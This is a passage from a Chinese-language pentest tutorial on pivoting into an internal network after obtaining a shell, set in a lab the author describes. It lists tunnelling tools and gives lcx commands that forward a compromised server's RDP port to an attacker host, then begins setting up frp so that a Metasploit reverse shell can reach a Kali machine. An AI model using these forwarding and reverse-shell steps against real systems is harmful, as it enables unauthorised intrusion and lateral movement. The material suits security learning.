一、前言
在拿到一台服务器的shell的时候,如果想要更进一步渗透测试,则需要进行内网渗透
而内网渗透的第一步就是挂代理,首先需要明确一个概念,在日常生活中常用vpn
挂代理去google查资料,自己搭过vpn
的人都知道,要在买的vps
上搭建ss的服务器端
,之后在自己电脑
上下载ss的客户端
,确定对应的加密协议和密码就能成功转发
而在内网渗透的流量转发是一个道理,是在拿到shell的服务器上使用工具让它变成代理的服务器端,之后在本机使用客户端工具进行连接
二、流量转发工具
需要放在拿到shell的服务器的服务器端可使用
1.lcx
2.msf
3.cobalt Strike
4.earthworm
5.reGeorg
本地的客户端可以使用
windows
1.proxifier
2.SocksCap64
linux
1.proxychains
三、本次测试的环境
本次环境是公司搭的一个一层内网学习环境,本篇文章只总结流量转发的方法,因此大致介绍下简化的拓扑结构
攻击机:
ip:10.86.0.87
win10(该ip能访问到最外层的DMZ区web服务器)
ip: xx.xx.xx.xx
kali (虚拟机,与主机win10 进行NAT连接)
被攻击机:
ip: 172.16.3.145
,192.168.93.143
web服务器(双网卡,192为内网ip)
ip: 192.168.93.138
内网服务器,上面80有个IIS服务(能访问到该web,则说明代理成功)
明确个概念
那么DMZ区服务器
弹shell到kali虚拟机
要通过本机做端口映射,kali
要访问内网web服务器
则代理需要设置成本机的端口
四、lcx转发
本工具只是端口流量转发,并不具备完整的proxy代理功能
举个例子服务器只能本地连3389,因此攻击机连不了,但是可以通过该工具将3389转发到攻击机的端口上,就能连接了
拿到shell后,上传lcx.exe
文件
将自身端口流量转发到攻击机端口上
使用方法
本机
接收2333端口来的流量,并在自己的2334端口打开
lcx.exe –listen 2333 2334
目标服务器
将自己的3389的流量转发到10.86.0.87攻击机
的2333端口上
lcx.exe -slave 10.86.0.87 2333 127.0.0.1 3389
rdp连接自己的2334端口
本身流量转发
这玩意儿还能在自己的上进行端口转发,比如把3389端口流量转到自己的2333端口
lcx.exe -tran 2333 127.0.0.1 3389
五、msf
msf它本身有流量转发的模块,因为本次的msf是在kali虚拟机里面的,又因为DMZ区服务器是没法访问到kali的,意味着反弹shell是没法直接实现的
在使用msf转发前,使用frp
将kali的监听端口映射到本机上
在本机中使用frps服务器端
frps.ini的配置如下,确定绑定的端口,token的值,转发的端口,即可